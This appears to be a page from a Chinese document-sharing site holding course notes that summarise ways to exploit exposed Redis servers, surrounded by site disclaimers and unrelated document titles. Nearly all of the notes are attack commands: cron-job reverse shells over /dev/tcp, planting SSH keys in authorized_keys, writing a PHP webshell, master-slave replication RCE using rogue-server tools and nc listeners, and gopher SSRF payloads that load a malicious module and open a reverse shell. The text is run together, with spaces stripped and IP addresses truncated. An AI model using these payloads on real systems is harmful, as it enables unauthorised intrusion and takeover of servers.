




版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請進(jìn)行舉報或認(rèn)領(lǐng)
文檔簡介
PAGE1redis利用總結(jié)主講moonsec利用計劃任務(wù)反彈shell/Fly_hps/article/details/102690282centos成功ubuntu失敗setxx"\n*****bash-i>&/dev/tcp/13/99990>&1\n"configsetdir/var/spool/cron/configsetdbfilenamerootsaveecho-e"\n\n*/1****/bin/bash-i>&/dev/tcp//12340>&1\n\n"|redis-cli-h29-xset1
redis-cli-h29configsetdir/var/spool/cron/
redis-cli-h29configsetdbfilenameroot
redis-cli-h29save redis密鑰登錄ssh生成密鑰公鑰ssh-keygen-trsa防止亂碼導(dǎo)出key(echo-e"\n\n";catid_rsa.pub;echo-e"\n\n")>key.txt導(dǎo)入內(nèi)容catkey.txt|redis-cli-h08--passpass123-xsetxxx--pass是登錄密碼無密碼可不填設(shè)置路徑configsetdir/root/.ssh設(shè)置文件名configsetdbfilenameauthorized_keys保存savessh登錄ssh-iid_rsaroot@08redis寫webshell08:6379>configsetdir/var/www/html/08:6379>configsetdbfilenameshell.php08:6379>setx"<?phpphpinfo();?>"08:6379>save利用主從復(fù)制RCE漏洞存在于4.x、5.x版本中,Redis提供了主從模式,主從模式指使用一個redis作為主機,其他的作為備份機,主機從機數(shù)據(jù)都是一樣的,從機只負(fù)責(zé)讀,主機只負(fù)責(zé)寫。在Reids4.x之后,通過外部拓展,可以實現(xiàn)在redis中實現(xiàn)一個新的Redis命令,構(gòu)造惡意.so文件。在兩個Redis實例設(shè)置主從模式的時候,Redis的主機實例可以通過FULLRESYNC同步文件到從機上。然后在從機上加載惡意so文件,即可執(zhí)行命令。受害人就是從機so文件攻擊者就是主機so文件工具下載/n0b0dyCN/redis-rogue-server/Testzero-wz/Awsome-Redis-Rogue-Serverpython3redis-rogue-server.py--rhost09--lhost45反彈shell監(jiān)聽端口nc-lvnp9999如果遇上帶密碼的改一下腳本就可以了。ssrfredis反彈shellgopher://:6379/_auth%2520welcometowangdingbeissrfme6379%250d%250aconfig%2520set%2520dir%2520/tmp/%250d%250aquitgopher://:6379/_auth%2520welcometowangdingbeissrfme6379%250d%250aconfig%2520set%2520dbfilename%2520exp.so%250d%250aslaveof%252019%252021000%250d%250aquit導(dǎo)入模塊gopher://:6379/_auth%2520welcometowangdingbeissrfme6379%250d%250amodule%2520load%2520./exp.so%250d%250aquit關(guān)閉主從gopher://:6379/_auth%2520welcometowangdingbeissrfme6379%250d%250aslaveof%2520NO%2520ONE%250d%250aquit設(shè)置數(shù)據(jù)庫名gopher://:6379/_auth%2520welcometowangdingbeissrfme6379%250d%250aconfig%2520set%2520dbfilename%2520dump.rdb%250d%250aquit反彈shellgopher://:6379/_auth%2520welcometowangdingbeissrfme6379%250d%250asystem.rev%252019%25206666%250d%250aquit本地redis主從復(fù)制RCE反彈shellkali命令nc-lvnp2333python3redis_rogue_server.py-v-pathexp.soubuntu上操作configsetdir/tmpconfigsetdbfilenameexp.soslaveof1921000moduleload./exp.soslaveofNOONEsystem.rev192333
溫馨提示
- 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
- 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
- 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負(fù)責(zé)。
- 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時也不承擔(dān)用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。
最新文檔
- 貸款合同的補充協(xié)議
- 2025年圣誕復(fù)活節(jié)裝飾品行業(yè)深度研究報告
- 臺州市黃巖恒帆模塑有限公司年新增 70 萬套塑料日用品技改項目環(huán)評報告
- 服裝模特勞務(wù)合同示例
- 焦慮水平與人際競爭對大學(xué)生情景線索學(xué)習(xí)的影響研究
- 行業(yè)交流會議服務(wù)合同
- 節(jié)點特征增強的信息溯源關(guān)鍵技術(shù)研究
- 屎腸球菌對斷奶五指山仔豬免疫功能和胃健康的影響
- 兒童照護(hù)保姆合同
- 議題組織合同履約金約定
- 流行性感冒診療方案(2025 年版)解讀課件
- 2025年公務(wù)員考試時事政治題及參考答案
- 2025年湖南湘投控股集團(tuán)有限公司招聘筆試參考題庫含答案解析
- 綠色建筑材料在土木工程施工中的應(yīng)用研究
- 第二十九節(jié) 商業(yè)模式創(chuàng)新及案例分析
- 中國鐵路沈陽局集團(tuán)有限公司招聘筆試沖刺題2025
- 2024年度醫(yī)療設(shè)備報廢回收與資源化利用合同3篇
- 醫(yī)療器械的維護(hù)和保養(yǎng)方法
- 石材養(yǎng)護(hù)報價單
- 世界各地的建筑·小學(xué)生課件
- 試題-醫(yī)療器械質(zhì)量管理培訓(xùn)
評論
0/150
提交評論